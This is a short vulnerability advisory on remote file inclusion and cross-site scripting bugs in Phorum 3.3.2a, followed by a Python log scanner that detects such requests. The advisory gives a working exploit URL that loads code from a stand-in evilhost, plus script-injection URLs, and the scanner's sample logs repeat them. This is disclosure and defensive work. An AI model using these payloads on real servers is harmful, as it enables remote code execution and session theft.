Target: Phorum 3.3.2a (maybe older)
Description: Phorum 3.3.2a lets remote users execute arbitrary code
Found by: Markus Arndt <markus-arndt@web.de>
Vendor: http://www.phorum.org
Notified Vendor: Yes, already fixed in 3.3.2b

Details:

Another bug for remote command execution. This time it's admin/actions/del.php :)

Some code:

    <?php
      // $include_path is not set anywhere in this file before it is used
      require "$include_path/delete_message.php";
      delete_messages($id);
      QueMessage("Message(s) $id and all children were deleted!<br>");
    ?>

The URL to exploit the script would be:

    http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls

That URL will make the script include http://[evilhost]/delete_message.php

GoGoGo and secure your boxes. :)

One other thing before I forget: CSS (cross-site scripting) attacks are possible on 2 files:

    http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
    http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>

Markus Arndt <markus-arndt@web.de>
http://skka.de
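
To check whether a server has received requests matching the two issues above, its access log can be scanned for a client-supplied include_path and for markup passed in GLOBALS[...] parameters. This is an added example, not part of the original advisory or Phorum's code; the log lines are constructed, and the function names and the Common Log Format layout are assumptions.

```python
# Added example: flag access-log requests that match the two issues above.
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: Common Log Format style lines with a quoted request line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"^\s*(?:https?|ftp)\s*:", re.I)  # URL-valued include_path
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)          # start of an HTML tag

# Constructed sample log; hosts, times and sizes are made up for the example.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2002:10:00:00 +0000] "GET /phorum/admin/actions/del.php?include_path=http%3A%2F%2Fremote.example&cmd=ls HTTP/1.0" 200 512
192.0.2.11 - - [01/Jan/2002:10:00:05 +0000] "GET /phorum/admin/footer.php?GLOBALS%5Bmessage%5D=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 300
192.0.2.12 - - [01/Jan/2002:10:00:09 +0000] "GET /phorum/list.php?f=1 HTTP/1.0" 200 4096
"""

def classify(target):
    """Return the findings for one request target (path plus query string)."""
    findings = []
    # parse_qsl percent-decodes names and values, so encoded probes match too.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name == "include_path":
            # Any client-supplied include_path is suspect; a URL is the worst case.
            if SCHEME.match(value):
                findings.append("remote-include")
            else:
                findings.append("include_path-override")
        elif name.startswith("GLOBALS[") and MARKUP.search(value):
            findings.append("globals-markup")
    return findings

def scan(log_text):
    """Return (line number, path, finding) for every suspicious request."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = match.group(1)
        for finding in classify(target):
            hits.append((lineno, urlsplit(target).path, finding))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit only shows that such a request was received; whether it succeeded depends on the installed Phorum version (3.3.2b contains the fix).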